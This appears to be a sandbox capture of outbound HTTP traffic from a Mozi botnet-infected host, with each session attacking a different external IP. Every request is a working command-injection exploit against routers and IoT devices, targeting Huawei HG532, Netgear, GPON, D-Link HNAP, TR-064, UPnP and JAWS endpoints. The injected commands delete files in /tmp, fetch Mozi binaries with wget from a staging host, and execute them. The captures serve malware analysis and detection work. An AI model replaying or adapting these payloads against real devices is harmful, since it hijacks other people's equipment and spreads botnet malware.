                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              38192.168.2.2336224124.74.74.1148080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263714075 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              39192.168.2.233821838.122.193.1528443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263726950 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              40192.168.2.2347786210.135.157.1080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263750076 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              41192.168.2.2350042137.151.78.14380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263783932 CET281OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                              User-Agent: Hello, world
                                                              Host: 137.151.78.143:80
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              42192.168.2.2354236136.34.183.280
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263798952 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              43192.168.2.235671285.78.252.11381
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263811111 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              44192.168.2.234153626.83.38.21637215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263847113 CET820OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 26.83.38.216:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              45192.168.2.235777635.36.155.1708443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263864040 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              46192.168.2.2347128167.210.102.1880
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263890028 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 167.210.102.18:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              47192.168.2.2353188118.35.168.1548080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263906956 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              48192.168.2.2353258163.152.100.2580
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263931990 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              49192.168.2.2339032134.32.128.2357574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263956070 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              50192.168.2.2350214125.133.16.2749152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263979912 CET931OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 125.133.16.27:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              51192.168.2.2339016123.244.144.20880
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.263998985 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              52192.168.2.2353766161.185.149.3280
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264020920 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              53192.168.2.2344088158.219.39.25437215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264045954 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 158.219.39.254:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              54192.168.2.23525285.244.147.2348080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264059067 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              55192.168.2.234215471.44.225.11280
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264081955 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              56192.168.2.235897279.39.229.2552869
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264106989 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: /
                                                              User-Agent: Hello-World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              57192.168.2.235928431.20.181.4852869
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264132023 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: /
                                                              User-Agent: Hello-World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 